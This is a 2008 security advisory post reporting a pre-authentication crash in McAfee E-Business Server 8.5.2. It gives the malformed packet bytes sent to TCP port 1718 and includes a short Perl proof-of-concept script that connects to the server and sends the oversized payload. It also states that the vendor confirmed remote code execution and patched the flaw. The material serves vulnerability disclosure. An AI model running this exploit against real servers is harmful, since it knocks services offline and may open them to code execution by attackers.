Thursday, January 10, 2008

[NEWS] McAfee E-Business Server Preauth Code DoS

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McAfee E-Business Server Preauth Code DoS


McAfee E-Business Server "guards sensitive corporate data with
industry-standard PGP 128-bit encryption and authentication. McAfee
E-Business Server supports a variety of platforms and security
certificates". It possible to crash McAffe's E-Business Server by sending
it a malicious packet to its TCP port 1718.


Vulnerable Systems:
* McAfee E-Business Server version 8.5.2

It is possible to crash McAfee E-Business Server during the authentication
process. When a malformed (oversized) initial authentication packet is
sent to E-Business Server, the server will crash, and will have to be
manually restarted.

A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953

McAfee further researched the vulnerability and confirmed that it allows
an attacker to also remotely execute code.

The vendor has addressed this vulnerability with E-Business server patch
update on January 8th, 2008.

Vendor advisory and update link:

<> sliceId=SAL_Public&command=show& forward=nonthreadedKC&kcId=614472

# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) -
# - tested on Windows and Linux
# Leon Juranic <>,
# Infigo IS <>

use IO::Socket;

$saddr = "";
$sport = 1718;

$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;

print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort =>
$sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;


The information has been provided by <> Leon
The original article can be found at:


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